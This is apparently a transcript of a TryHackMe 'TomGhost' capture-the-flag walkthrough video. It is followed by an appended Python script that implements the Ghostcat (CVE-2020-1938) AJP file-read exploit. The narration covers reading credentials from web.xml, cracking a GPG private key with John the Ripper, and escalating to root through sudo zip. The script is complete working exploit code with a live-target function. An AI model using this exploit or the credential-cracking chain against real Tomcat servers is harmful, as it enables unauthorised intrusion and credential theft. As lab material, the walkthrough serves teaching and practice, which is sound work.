Hey everyone, at the front of this video I wanted to include a short and quick little announcement, because I'm very, very excited about NahamCon. NahamCon is happening June 13th, 2020, this Saturday. That'll be live on twitch.tv/nahamsec. Ben from HackerOne is going to be putting this event on along with myself, STÖK and The Cyber Mentor. There'll be seven hours of talks, and Sunday is dedicated to three different workshops, so you can find out the whole talk schedule and everything online at nahamcon.com. Along with that, I'm going to be hosting the capture-the-flag competition. The capture-the-flag competition starts the day before, June 12th, that Friday, and it'll go until about the time of my talk at the very end of the actual conference on Saturday. So registration is finally open and live if you want to go check that out: you can go to ctf.nahamcon.com. That is HTTPS, because I know a lot of people got angry at me when I posted VirSecCon without it. But please, please, please go register. It's going to be a 31-hour competition. If you enjoyed VirSecCon, this game will be even bigger and even better, so please go sign up. It's going to be a blast and I'm really, really excited about it, and I hope that you are too. So please go check it out at ctf.nahamcon.com, and enjoy the video. I'll see you guys there next week, only seven days till the game.

Hello everyone, my name is John Hammond and welcome back to another TryHackMe YouTube video. In this case I want to be showcasing the TomGhost room, which demonstrates the Ghostcat vulnerability, very, very recent in terms of some of the Tomcat web servers. So let's hop on over to my screen and I'll show you the room here.
I've got it open and I have joined the room. I've deployed the machine here. The only prompt that we have for all of these is "Compromise this machine and obtain user.txt, and then escalate privileges and obtain root.txt". So it looks like we're just kind of on our own, not the usual guided process that TryHackMe typically offers for us. So I have this machine here. I'll go ahead and create a directory for this, so let's make directory tomghost. Let's hop in there and I will create a README directory, or a file anyway, so I can keep track of some of our notes here. And with that I will keep track of the IP address as a variable, so I can just spit that into a lot of different shells and I'm not gonna have to retype it all the time. Create all these tasks here. Let's actually create a section for the nmap scan, which we can go ahead and fire off. Ideally, hopefully, hopefully the machine is up and all the ports are accessible. If not, I'll just pause the video and we'll keep waiting, but I have been able to ping it. Oh, and I need to go ahead and create that nmap directory. There we go. But I mean, as you can see... here, I'll ping the IP address. He seems to be up, so hopefully that nmap scan will return some good stuff for us. But anyway, let's go try to see if it has a web server. I entered my export command into my URL bar, so that wasn't very, very helpful. Okay, he still needs a little bit of time to get his web server up, so I'll pause the video and we'll get back to it once that's ready.

Okay, so it's been a few minutes and my nmap scan actually returned. Looks like we have port 22 open, 53, and 8009 as well as 8080. So the 8080 must be Tomcat. Looks like there actually wasn't anything on 80 itself, so that page would never have loaded for me regardless. Apache Tomcat, one of the later versions. This one should still be susceptible to Ghostcat, this recent vulnerability. Let me go ahead and do some googling on that. We'll check out Ghostcat.
See what it really is. If you want to do a little bit more in-depth reading here, you certainly can; there are a lot of articles about it, this new, recent vulnerability in 2020. It came out in, like, March. The AJP protocol, Apache JServ Protocol, is a binary protocol used in the Apache Tomcat web servers for messaging communication with the server and servlets. I won't go deep in the weeds on really everything that this contains; I'd rather just go ahead and exploit it. So the notion here, though, is that this can quickly become a venue and outlet for remote code execution, so we can get in and get control of the box. They actually have an interesting tweet here: if you upload files and those are saved in an accessible spot, those could be turned into remote code execution. I believe we don't do that in this specifically, in the Ghostcat room. Let's see what we do, though.

So I'm gonna just simply Google the Ghostcat GitHub exploits, or "ghostcat exploit github", whatever you want to track down. I see a cool one from full hub. I see some verification one. I've had a lot of success with the 00theway one, but again, it's certainly useful and worthwhile to go check out some of these. It looks like this one also does a similar technique as what the others do. The verification one I haven't checked out, though; that looks like it might just try to determine if it is vulnerable but not actually exploit it. This one, ajpShooter from 00theway, looks to work very, very well, and kind of did for my testing prior. So let's go ahead and download this. I'll git clone it. I will git clone this. Checking out the usage here, it showcases the arguments that we can supply: the URL, the port, whether I want to read or eval something, and what we might be looking for. So the WEB-INF/web.xml file in Tomcat, and in AJP for what we're working with, might very well have some useful information on users and other, like, system configuration files.
So let's go ahead and try that. That's in the Ghostcat directory now. If you were to run python ajpShooter, it looks like it needs all of the arguments that we would supply, so the URL for one thing, the AJP port, and you can see in their screenshots they showcase some good examples here. So I'll fire this up. 8080 is for the actual Tomcat itself, and you can see that again in our example here the AJP server was on 8009, and what we want to read is WEB-INF/web.xml, and read. So: 8009, WEB-INF/web.xml, read. That triggers it and fires it away. Looks like it says "Welcome to GhostCat" and potentially some credentials here with this skyfuck user and that. So that read that web.xml file for us and now we've got that useful information. I'm just gonna copy this and slap it into our notes: exploiting Ghostcat, so we have this user skyfuck. Okay, so SSH is open, so we could potentially SSH with that to the IP address. Go ahead and do that. We'll grab his password in here. Hey, okay.

All right, so what do we have in here? Looks like we have a credential.pgp and a tryhackme.asc file. So these are some GNU Privacy Guard, or Pretty Good Privacy, files that are encrypted, so we could go ahead and work with these. I'm gonna go ahead and download them. So let's scp to skyfuck at that IP address and let's grab everything in their home directory and move it into this here. It's gonna ask for that password, which we should still have in our clipboard, so I can just paste that in and now we're downloading these. So, this ASC file. Let's take a look at these. Let me file these. Opening the ASC file, it has some particular information here if I check this out: it is a private key block. So we might need to crack this. We can thankfully do this with John the Ripper, so let's start that process. The GPG file, that's the straight-up encrypted one, so we're going to use that with kind of the key that we could potentially get out of the ASC file. Let's go.
Let's use John the Ripper's run/gpg2john from /opt on our tryhackme.asc, and then we can go ahead and give that to a file, hashes for John. And now let's run that John the Ripper utility on that hashes-for-John file, and we'll use our wordlist rockyou.txt, which I have in my /opt directory because that's where I put a lot of my tools and stuff. Looks like it can crank through this. In other words, I don't know if I need to supply a format or if it'll figure it out, so I'm gonna stand by and see if it actually cracks anything. Okay, as that was rolling through I realized I probably had the arguments set up in the wrong way. I should use the wordlist before I specify the actual hashes that I want to use, because that way it won't get confused on what hashes it might be looking at. So: --wordlist rockyou.txt. Now while that's cranking through... awesome, it finds the password. So that should be gpg --import that tryhackme.asc file and, using the password that we just had it crack, we should be able to go ahead and actually enter that. Alexandre was what we used. That's been imported successfully. Now I should be able to gpg --decrypt our credential.pgp. There we go. Okay, so merlin now is an account that we can access and we have a successful password for that. So let's go ahead and, I guess, take note of that and try an SSH with that guy. So let's break out of that skyfuck session and let's move into merlin, supply that password, and now we have a new user that we can log in as. We have user.txt. There we go, there's our flag. I accidentally pasted the password in the prompt, whatever. Let's go ahead and paste that guy in.

And now let's start to try and enumerate, see how we can privesc. Checking just simple sudo entries: looks like, what commands can we run as merlin with sudo privileges? We can run NOPASSWD /usr/bin/zip, which is pretty great because that's totally got to be something in GTFOBins. So let's go check out.
What can we do with zip? Should be able to go ahead and get a shell. So zip, go ahead and run something to get a shell, and it needs a temporary directory. So whatever, let's just try to spin that up. There we go. Entering those commands, we simply have our flag as root. You can see our prompt here, we have our hash, so we are in fact root. If I check out my directory, I moved us into the root directory; id, whoami, we are in fact root. So let's check out that root.txt file. Super easy privesc to go ahead and steal that root.txt file.

Okay, that was that room. A little bit of a stumbling block, at least in my case, because of GPG. I guess I don't know why I was being stupid and didn't even bother with the keys on that. But that's how you can do that: if you have that ASC file, you can import that, get the cracked password if you can determine that, and go ahead and decrypt anything that was used with that. So Ghostcat, right, that's the vulnerability, that was the kind of exploit, and I think that that reference there is actually really, really cool. Looking through these, ajpShooter seemed to be pretty effective in my case. I guess I'd have to take a look at some of these other tools and utilities to do some damage with that recent Tomcat vulnerability.

Anyway, thank you guys so much for watching. I hope you enjoyed this video. If you did, please do press that like button. If you didn't, I don't know what to tell you. Sorry. Maybe next time. What do you want me to say? Okay, thanks for watching. Love to see you guys in the Discord server; there's a link in the description. Please do comment, please do subscribe, please do check it out on Patreon, PayPal. I appreciate any of your support. I'm so, so grateful for you guys. It's just surreal. So thanks for everything. Take care. I'm gonna end the video now. This is weird. Goodbye.
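The video drives ajpShooter without looking at what it puts on the wire. The following is an added example, not code from the video, the TryHackMe room or the ajpShooter project: it builds the AJP13 FORWARD_REQUEST that makes Tomcat's default servlet include an arbitrary webapp file (the Ghostcat bug, CVE-2020-1938), and parses the SEND_HEADERS / SEND_BODY_CHUNK / END_RESPONSE packets that come back. It assumes the AJP connector listens on 8009, that req_uri "/" maps to the default servlet, and that the container honours the three javax.servlet.include.* request attributes; the SAMPLE_RESPONSE is a constructed packet sequence, not a real capture.

```python
"""Ghostcat (CVE-2020-1938) AJP13 request builder and response parser.

Added example, not code from the video or from ajpShooter. Assumes the AJP
connector is on 8009 and that the default servlet honours the
javax.servlet.include.* request attributes, which is the Ghostcat bug.
"""
import socket
import struct

AJP_PORT = 8009                 # AJP connector seen in the room's nmap output
AJP_CLIENT_MAGIC = b"\x12\x34"  # client -> container packets
AJP_SERVER_MAGIC = b"AB"        # container -> client packets


def ajp_string(s):
    """Encode an AJP string: 2-byte big-endian length, bytes, NUL terminator."""
    raw = s.encode()
    return struct.pack(">H", len(raw)) + raw + b"\x00"


def build_ghostcat_request(target_file, server_name="localhost", server_port=8080):
    """Build a FORWARD_REQUEST that makes the default servlet include target_file.

    target_file is webapp-relative, e.g. "/WEB-INF/web.xml". The three
    javax.servlet.include.* attributes are what turn a plain GET into a file read.
    """
    body = b"\x02"                      # prefix code 2 = FORWARD_REQUEST
    body += b"\x02"                     # method code 2 = GET
    body += ajp_string("HTTP/1.1")
    body += ajp_string("/")             # req_uri; "/" hits the default servlet (assumption)
    body += ajp_string("127.0.0.1")     # remote_addr
    body += ajp_string("localhost")     # remote_host
    body += ajp_string(server_name)
    body += struct.pack(">H", server_port)
    body += b"\x00"                     # is_ssl = false
    body += struct.pack(">H", 0)        # num_headers = 0
    for name, value in (
        ("javax.servlet.include.request_uri", "/"),
        ("javax.servlet.include.path_info", target_file),
        ("javax.servlet.include.servlet_path", "/"),
    ):
        body += b"\x0a" + ajp_string(name) + ajp_string(value)  # 0x0A = req_attribute
    body += b"\xff"                     # request terminator
    return AJP_CLIENT_MAGIC + struct.pack(">H", len(body)) + body


def parse_ajp_response(data):
    """Walk container packets and return (http_status, body_bytes).

    Packet prefix codes: 4 = SEND_HEADERS, 3 = SEND_BODY_CHUNK, 5 = END_RESPONSE.
    """
    status, body, pos = None, b"", 0
    while pos + 4 <= len(data):
        if data[pos:pos + 2] != AJP_SERVER_MAGIC:
            raise ValueError("bad AJP magic at offset %d" % pos)
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pkt = data[pos + 4:pos + 4 + length]
        pos += 4 + length
        if pkt[0] == 4:                                   # SEND_HEADERS: status int first
            status = struct.unpack(">H", pkt[1:3])[0]
        elif pkt[0] == 3:                                 # SEND_BODY_CHUNK: len + bytes
            n = struct.unpack(">H", pkt[1:3])[0]
            body += pkt[3:3 + n]
        elif pkt[0] == 5:                                 # END_RESPONSE
            break
    return status, body


def ghostcat_read(host, target_file, port=AJP_PORT, timeout=5):
    """Send the request to a live AJP connector and return (status, body)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_ghostcat_request(target_file))
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
            if b"AB\x00\x02\x05" in data:   # END_RESPONSE packet has arrived
                break
    return parse_ajp_response(data)


def _server_packet(payload):
    return AJP_SERVER_MAGIC + struct.pack(">H", len(payload)) + payload


# Constructed sample (not a real capture): what a vulnerable connector would answer.
SAMPLE_WEB_XML = b"<web-app>\n  <description>Welcome to GhostCat</description>\n</web-app>\n"
SAMPLE_RESPONSE = (
    _server_packet(b"\x04" + struct.pack(">H", 200) + ajp_string("OK") + struct.pack(">H", 0))
    + _server_packet(b"\x03" + struct.pack(">H", len(SAMPLE_WEB_XML)) + SAMPLE_WEB_XML + b"\x00")
    + _server_packet(b"\x05\x01")
)

if __name__ == "__main__":
    print(parse_ajp_response(SAMPLE_RESPONSE))
```

Against a live target you would call ghostcat_read("10.10.x.x", "/WEB-INF/web.xml"); the offline run only exercises the encoder and parser on the constructed response. Note that the read is confined to the webapp's document root, which is why the room gives you web.xml rather than /etc/passwd.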